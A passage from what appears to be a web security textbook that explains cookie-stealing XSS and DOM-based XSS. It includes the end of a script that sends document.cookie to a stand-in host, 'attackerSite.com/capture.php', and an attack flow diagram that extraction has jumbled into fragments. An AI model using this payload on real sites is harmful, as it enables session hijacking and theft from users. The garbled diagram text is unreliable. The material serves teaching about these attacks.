Chapter 6 - Attack execution ( 2 ) P a g e | 134
var serializedData = serialize ( documnent . cookie );
xhttp . open (" GET ", http :// attackerSite . com / capture . php ?"+ serializedData , fal se ); xhttp . send (); </ script >
In the previous code the first part is just responsible on serializing an object to be serialized querystring in time where the second part defines an XMLHttpRequest object and use it to send serialized version of the document . cookie object which will give the attacker the ability to initiate session hijacking attack .
6.17 Data Object Model Based XSS
1
@ |
Attacker creates and send a crafted link poisoned with |
2 |
Send a request to the vulnerable page with poisoned parameter |
Client |
The page will be sent as is without any info related to attacker submitted parameters |
3 |
Vulnerable page |
Client execute the script embedded in the shared content a release attack |
4 |
|
|
Attack requirement : A . The vulnerable page contains a script that extract info from URL and show it back without sanitization .
Attack process :
A . The attacker creates a link that uses the vulnerable page with parameter containing the attacker url and a script .
B . The attacker will be able to steal the cookie object of the victim and send it to its site .